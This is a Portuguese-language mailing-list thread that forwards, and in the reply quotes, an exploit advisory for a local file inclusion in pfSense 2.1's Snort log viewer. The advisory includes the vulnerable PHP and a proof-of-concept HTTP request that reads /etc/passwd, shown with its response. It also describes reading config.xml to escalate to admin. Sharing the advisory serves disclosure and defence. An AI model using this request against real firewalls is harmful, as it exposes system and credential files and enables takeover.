[FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)

2014-01-28 Por tôpico Welkson Renny de Medeiros 
Senhores, boa tarde!

Alerta pra quem usa o package Snort no pfSense.

Welkson

...

##
#  _ ___  _   _    _  _
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| | / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_\___/|_| \_|\|\/_/   \_\_|
#
# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI)  Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#
#



pfSense firewall/router distribution description :

==

pfSense is a free, open source customized distribution of FreeBSD tailored
for use as a firewall and router. In addition to being a powerful, flexible
firewalling and routing platform, it includes a long list of related
features and a package system allowing further expandability without adding
bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its
inception, and proven in countless installations ranging from small home
networks protecting a PC and an Xbox to large corporations, universities
and other organizations protecting thousands of network devices.

This project started in 2004 as a fork of the m0n0wall project, but focused
towards full PC installations rather than the embedded hardware focus of
m0n0wall. pfSense also offers an embedded image for Compact Flash based
installations, however it is not our primary focus.

Attack Scenario

==

Authenticated users with only permission to access some packages in web gui
(a.k.a. webConfigurator) will be able to escalate themselves to other
privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
LFI), result in fully compromise the pfSense.

This attack abuse the user privilege scheme with some of official packages
(System  Package Manager)

* Session Hijacking also possible to steal less privileged user sessions to
perform this trick  due to http admin by default webConfigurator.

Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
Vulnerability

Vulnerable file:

==

snort_log_view.php

[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14

Vulnerable Source Code :
==
http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php

...(deducted)...

$contents = '';
// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?

if (file_exists($_GET['logfile']))
   $contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
   $contents = gettext(\n\nERROR -- File: {$_GET['logfile']} not
found!);
$pgtitle = array(gettext(Snort), gettext(Log File Viewer));
?

...(deducted)...
textarea style=width:100%; height:100%; readonly wrap=off rows=33
cols=80 name=code2?=$contents;?/textarea
...(deducted)...



Proof of Concept 1 : Arbitrary File Inclusion
==

GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=18
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32

...(deducted)...
td colspan=2 valign=top class=label
   div style=background: #ee; width:100%; height:100%;
id=textareaitem!-- NOTE: The opening *and* the closing textarea tag
must be on the same line. --
   textarea style=width:100%; height:100%; readonly wrap=off
rows=33 cols=80 name=code2root:*:0:0:Charlie :/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System :/:/usr/sbin/nologin
...(deducted)...
havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin

Re: [FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)

2014-01-28 Por tôpico firebits 
Show! (na visão de pesquisa em vulnerabilidades)

@firebitsbr


2014-01-28 Welkson Renny de Medeiros welk...@gmail.com

 Senhores, boa tarde!

 Alerta pra quem usa o package Snort no pfSense.

 Welkson

 ...

 ##
 #  _ ___  _   _    _  _
 #  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
 #  | |  | | | |  \| | |  _| | / _ \ | |
 #  | |__| |_| | |\  | |_| | |___ / ___ \| |
 #  |_\___/|_| \_|\|\/_/   \_\_|
 #
 # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
 users (LFI/RCE)
 # Date: 25/01/2014 (0-day)
 # Exploit Author: @u0x (Pichaya Morimoto)
 # Software Link: www.pfsense.org
 # Category: Local File Inclusion (LFI)  Privilege Escalation
 # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
 #
 #



 pfSense firewall/router distribution description :

 ==

 pfSense is a free, open source customized distribution of FreeBSD tailored
 for use as a firewall and router. In addition to being a powerful, flexible
 firewalling and routing platform, it includes a long list of related
 features and a package system allowing further expandability without adding
 bloat and potential security vulnerabilities to the base distribution.
 pfSense is a popular project with more than 1 million downloads since its
 inception, and proven in countless installations ranging from small home
 networks protecting a PC and an Xbox to large corporations, universities
 and other organizations protecting thousands of network devices.

 This project started in 2004 as a fork of the m0n0wall project, but focused
 towards full PC installations rather than the embedded hardware focus of
 m0n0wall. pfSense also offers an embedded image for Compact Flash based
 installations, however it is not our primary focus.

 Attack Scenario

 ==

 Authenticated users with only permission to access some packages in web gui
 (a.k.a. webConfigurator) will be able to escalate themselves to other
 privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
 LFI), result in fully compromise the pfSense.

 This attack abuse the user privilege scheme with some of official packages
 (System  Package Manager)

 * Session Hijacking also possible to steal less privileged user sessions to
 perform this trick  due to http admin by default webConfigurator.

 Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
 Vulnerability

 Vulnerable file:

 ==

 snort_log_view.php

 [+] Checksum
 SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
 MD5: cd767e46a4e9e09ede7fd26560e37f14

 Vulnerable Source Code :
 ==
 http://www.pfsense.com/packages/config/snort/snort_log_view.php

 https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php

 ...(deducted)...

 $contents = '';
 // Read the contents of the argument passed to us.
 // Is it a fully qualified path and file?

 if (file_exists($_GET['logfile']))
$contents = file_get_contents($_GET['logfile']);
 // It is not something we can display, so print an error.
 else
$contents = gettext(\n\nERROR -- File: {$_GET['logfile']} not
 found!);
 $pgtitle = array(gettext(Snort), gettext(Log File Viewer));
 ?

 ...(deducted)...
 textarea style=width:100%; height:100%; readonly wrap=off rows=33
 cols=80 name=code2?=$contents;?/textarea
 ...(deducted)...



 Proof of Concept 1 : Arbitrary File Inclusion
 ==

 GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
 Host: firewall1.pentestlab1:1337
 Connection: keep-alive
 Accept:
 text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: th,en-US;q=0.8,en;q=0.6
 Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

 HTTP/1.1 200 OK
 Expires: Mon, 27 Jan 2014 07:25:10 GMT
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: max-age=18
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
 pre-check=0
 Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
 X-Frame-Options: SAMEORIGIN
 Pragma: no-cache
 Content-type: text/html
 Transfer-Encoding: chunked
 Date: Sat, 25 Jan 2014 05:25:10 GMT
 Server: lighttpd/1.4.32

 ...(deducted)...
 td colspan=2 valign=top class=label
div style=background: #ee; width:100%; height:100%;
 id=textareaitem!-- NOTE: The opening *and* the closing textarea tag
 must be on the same line. --
textarea style=width:100%; height:100%; readonly wrap=off
 rows=33 cols=80 name=code2root:*:0:0:Charlie :/root:/bin/sh